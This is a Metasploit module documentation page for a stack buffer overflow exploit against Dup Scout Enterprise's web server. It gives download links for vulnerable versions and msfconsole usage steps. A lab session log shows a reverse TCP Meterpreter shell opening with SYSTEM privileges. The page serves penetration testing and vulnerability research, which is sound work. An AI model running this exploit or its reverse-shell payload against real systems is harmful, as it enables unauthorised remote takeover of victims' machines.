metasploit-framework/documentation/modules/exploit/windows/http/dupscts_bof.md

Vulnerable Application

This module exploits a stack-based buffer overflow vulnerability in the web interface of Dup Scout Enterprise] versions <= 10.0.18, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server which can be leveraged to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.

This module supports x86 versions of Dup Scout Enterprise and x86 Windows operating systems only and has been tested successfully on Windows 7 SP1 (x86) and Windows XP SP0 (x86).

Verification Steps

Download:

• https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe
• https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
• https://www.exploit-db.com/apps/4ead3eadc19bf3511e8dfd606624e310-dupscoutent_setup_v9.1.14.exe
• https://www.exploit-db.com/apps/3ca0c9aee534994bc6894bfb309e5a4f-dupscoutent_setup_v9.0.28.exe
• https://web.archive.org/web/20170302/http://www.dupscout.com/setups/dupscoutent_setup_v9.0.28.exe
• https://web.archive.org/web/20160408/http://www.dupscout.com/setups/dupscoutent_setup_v8.3.16.exe
• https://web.archive.org/web/20160826/http://www.dupscout.com/setups/dupscoutent_setup_v8.4.16.exe

Install the application from the link above and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.

Metasploit:

1. Start msfconsole
2. Do: use exploit/windows/http/dupscts_bof
3. Do: set rhosts <rhosts>
4. Do: run
5. You should get a shell.

Options

Scenarios

Dup Scout Enterprise v9.9.14 on Windows 7 SP1 (x86)

msf6 > use exploit/windows/http/dupscts_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dupscts_bof) > set rhosts 172.16.191.213
rhosts => 172.16.191.213
msf6 exploit(windows/http/dupscts_bof) > check
[*] 172.16.191.213:80 - The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
msf6 exploit(windows/http/dupscts_bof) > set lhost 172.16.191.192 
lhost => 172.16.191.192
msf6 exploit(windows/http/dupscts_bof) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise v9.9.14 (x86)
[*] Sending payload (8577 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.213
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.213:49380) at 2021-02-25 11:29:52 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-7-ULTIMATE-
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >